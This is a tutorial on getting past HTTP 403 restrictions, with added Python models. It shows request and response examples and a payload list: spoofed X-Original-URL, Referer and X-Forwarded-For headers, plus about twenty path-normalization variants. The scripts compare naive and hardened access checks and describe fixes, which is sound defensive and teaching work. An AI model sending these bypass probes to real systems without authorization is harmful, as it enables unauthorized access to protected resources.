1. Request override bypass
-
Some backends honour the X-Original-URL and X-Rewrite-URL request headers and route the request to the path named in the header instead of the path in the request line. If access control is enforced in front of that backend, by a cache, reverse proxy or web server rule that only inspects the request-line path, you can try sending a harmless path in the request line and the restricted path in the header to get past the restriction.
-
Request
GET /ylaq/Good HTTP/1.1

Response
HTTP/1.1 403 Forbidden

Request
GET / HTTP/1.1
X-Original-URL: /ylaq/Good

Response
HTTP/1.1 200 OK
2. Referer header bypass
-
Some servers decide whether to serve a resource by looking at the Referer header, for example only allowing requests that appear to come from one of their own pages. Since the client sets Referer, such a loosely implemented check is bypassed by simply supplying the value the server expects.
-
Request
GET /ylaq/Good HTTP/1.1
Host: xxx

Response
HTTP/1.1 403 Forbidden

Request
GET / HTTP/1.1
Host: xxx
Referer: https://xxx/ylaq/Good

Response
HTTP/1.1 200 OK
3. Forged client IP headers
-
A request may also carry headers that claim to describe where it came from. Some resources are only allowed from localhost or from the internal network, and a backend that derives the client address from one of these headers instead of from the TCP connection (typically because it expects a reverse proxy to have set the header, but never checks who actually sent it) can be tricked by supplying the header yourself with an internal address:
-
X-Forwarded-For: 127.0.0.1
X-Originating-IP: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Client-IP: 127.0.0.1
X-Host: 127.0.0.1
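Added example, not code from the original page: a Python model of a backend that exposes an internal-only resource and resolves the client address either naively, from whichever of the headers above is present, or correctly, by walking X-Forwarded-For only when the TCP peer is one of its own reverse proxies. The internal networks, the trusted proxy 10.0.0.2, the attacker address 203.0.113.7 and the sample requests are all constructed for this example.

```python
import ipaddress

# Headers a permissive backend might consult for the client address (the page's list,
# in the order this constructed backend checks them).
SPOOFABLE_HEADERS = ("x-forwarded-for", "x-originating-ip", "x-remote-ip", "x-client-ip", "x-host")
# Assumed: the only reverse proxy that is allowed to set X-Forwarded-For.
TRUSTED_PROXIES = {"10.0.0.2"}
# Assumed definition of "internal": loopback plus the RFC 1918 ranges.
INTERNAL_NETS = [ipaddress.ip_network(n) for n in
                 ("127.0.0.0/8", "10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]


def is_internal(ip: str) -> bool:
    """True if ip parses and falls inside one of INTERNAL_NETS."""
    try:
        addr = ipaddress.ip_address(ip)
    except ValueError:
        return False
    return any(addr in net for net in INTERNAL_NETS)


def client_ip_naive(headers: dict, peer_ip: str) -> str:
    """Vulnerable: takes the first matching forwarding header at face value,
    no matter who connected."""
    h = {k.lower(): v for k, v in headers.items()}
    for name in SPOOFABLE_HEADERS:
        if name in h:
            return h[name].split(",")[0].strip()
    return peer_ip


def client_ip_trusted(headers: dict, peer_ip: str, trusted_proxies=TRUSTED_PROXIES) -> str:
    """Hardened: forwarding headers count only when the TCP peer is one of our
    proxies, and the client is the right-most X-Forwarded-For hop that is not
    itself a trusted proxy (proxies append, so a client cannot control that slot)."""
    if peer_ip not in trusted_proxies:
        return peer_ip  # direct connection: every header is attacker input
    h = {k.lower(): v for k, v in headers.items()}
    hops = [x.strip() for x in h.get("x-forwarded-for", "").split(",") if x.strip()]
    for hop in reversed(hops):
        if hop not in trusted_proxies:
            return hop
    return peer_ip  # every hop was one of our proxies: the request really is internal


def allowed(resolver, headers: dict, peer_ip: str) -> bool:
    """Internal-only resource: admit the request iff the resolved client IP is internal."""
    return is_internal(resolver(headers, peer_ip))


# Constructed requests. 203.0.113.7 plays the external attacker.
# Spoofed header sent straight to the backend:
DIRECT_SPOOF = ({"X-Forwarded-For": "127.0.0.1"}, "203.0.113.7")
# Same spoof sent through the real proxy, which appends the true client address:
VIA_PROXY_SPOOF = ({"X-Forwarded-For": "127.0.0.1, 203.0.113.7"}, "10.0.0.2")
# A genuine internal client behind the proxy:
VIA_PROXY_LEGIT = ({"X-Forwarded-For": "192.168.1.20"}, "10.0.0.2")

if __name__ == "__main__":
    for label, req in (("direct spoof", DIRECT_SPOOF), ("spoof via proxy", VIA_PROXY_SPOOF),
                       ("legit via proxy", VIA_PROXY_LEGIT)):
        print(f"{label:16} naive={allowed(client_ip_naive, *req)} "
              f"trusted={allowed(client_ip_trusted, *req)}")
```

The naive resolver admits both spoofed requests because 127.0.0.1 is whatever the attacker typed; the hardened one admits only the genuine internal client. The hardened version still depends on the proxy being the only path to the backend and on it overwriting or appending to X-Forwarded-For rather than passing client values through, and it ignores the other four headers entirely, which is the point: X-Host and friends carry no provenance at all.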
4. Request path bypass
-
If /ylaq/Good returns 403 Forbidden when requested directly, try appending a '/' and requesting /ylaq/Good/ instead; this sometimes gets past the restriction. It works when the component enforcing the rule matches the path exactly as received, while the backend normalizes the path before serving it (collapsing repeated slashes, resolving . and .. segments, percent-decoding, stripping ;path-parameters, trimming whitespace), so the two components see different paths. Commonly tried variants:
-
ylaq.com/Good          => 403
ylaq.com/Good/         => 200
ylaq.com/Good//        => 200
ylaq.com//Good//       => 200
ylaq.com/Good/*        => 200
ylaq.com/Good/*/       => 200
ylaq.com/Good/.        => 200
ylaq.com/Good/./       => 200
ylaq.com/./Good/./     => 200
ylaq.com/Good/./.      => 200
ylaq.com/Good?         => 200
ylaq.com/Good??        => 200
ylaq.com/Good???       => 200
ylaq.com/Good..;/      => 200
ylaq.com/Good/..;/     => 200
ylaq.com/%2f/Good      => 200
ylaq.com/%2e/Good      => 200
ylaq.com/Good%20/      => 200
ylaq.com/Good%09/      => 200
ylaq.com/%20Good%20/   => 200
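As an added example (not from the original page), the following Python script models the mismatch behind sections 1 and 4 together: a front-end rule that matches the raw request-target exactly, in front of a lenient backend that honours X-Original-URL / X-Rewrite-URL and canonicalizes the path (Tomcat-style ;param stripping, percent-decoding, slash collapsing, dot-segment resolution). The protected path /Good, the probe list and the backend model are assumptions, and a real backend's normalization may differ. It also shows a hardened edge rule that rejects override headers and compares the same canonical form the backend routes on.

```python
import posixpath
import re
from urllib.parse import unquote

# Constructed target path, standing in for the page's /ylaq/Good.
PROTECTED = "/Good"
# Override headers a permissive backend may honour (section 1).
OVERRIDE_HEADERS = ("x-original-url", "x-rewrite-url")


def canonical_path(raw: str) -> str:
    """Assumed model of how a lenient backend turns a request-target into a route:
    drop the query, strip ;params from every segment (as Tomcat does),
    percent-decode, collapse repeated slashes, resolve '.' and '..'."""
    path = raw.split("?", 1)[0]
    path = "/".join(seg.split(";", 1)[0] for seg in path.split("/"))
    path = unquote(path)
    path = re.sub(r"/+", "/", path)
    return posixpath.normpath(path) if path else "/"


def backend_route(raw: str, headers: dict) -> str:
    """Vulnerable backend: an override header replaces the request-line path."""
    h = {k.lower(): v for k, v in headers.items()}
    for name in OVERRIDE_HEADERS:
        if name in h:
            return canonical_path(h[name])
    return canonical_path(raw)


def edge_denies_naive(raw: str, headers: dict) -> bool:
    """Naive front-end rule: exact match on the raw request-target, headers ignored."""
    return raw in (PROTECTED, PROTECTED + "/")


def edge_denies_hardened(raw: str, headers: dict) -> bool:
    """Hardened rule: refuse override headers outright, then compare the same
    canonical form the backend will route on."""
    names = {k.lower() for k in headers}
    if any(name in names for name in OVERRIDE_HEADERS):
        return True
    return canonical_path(raw) == PROTECTED


def find_bypasses(requests, edge):
    """Return the (raw path, headers) pairs the edge lets through but the
    backend nevertheless routes to PROTECTED."""
    return [
        (raw, hdrs)
        for raw, hdrs in requests
        if not edge(raw, hdrs) and backend_route(raw, hdrs) == PROTECTED
    ]


# Constructed probes: the header override from section 1 plus path variants from section 4.
PROBES = [
    ("/", {"X-Original-URL": "/Good"}),
    ("/", {"X-Rewrite-URL": "/Good"}),
    ("/Good", {}),
    ("/Good/", {}),
    ("/Good//", {}),
    ("//Good//", {}),
    ("/Good/.", {}),
    ("/Good/./", {}),
    ("/./Good/./", {}),
    ("/Good?", {}),
    ("/x/..;/Good", {}),   # path-parameter form of the ..;/ trick
    ("/%2f/Good", {}),
    ("/%2e/Good", {}),
    ("/Good%20/", {}),     # only works against a backend that also trims whitespace
]

if __name__ == "__main__":
    for raw, hdrs in find_bypasses(PROBES, edge_denies_naive):
        print(f"bypass: {raw!r} {hdrs} -> {backend_route(raw, hdrs)}")
    print("with hardened edge:", find_bypasses(PROBES, edge_denies_hardened))
```

Running it lists eleven probes that reach /Good under the naive rule and none under the hardened one. The hardened edge is only as good as how faithfully its canonicalization matches the real backend (the %20 probe, for instance, would bypass a backend that trims whitespace but not this model), so the reliable fix is to enforce the authorization check inside the backend, on the path it actually routes, and to have the proxy strip X-Original-URL and X-Rewrite-URL from incoming requests.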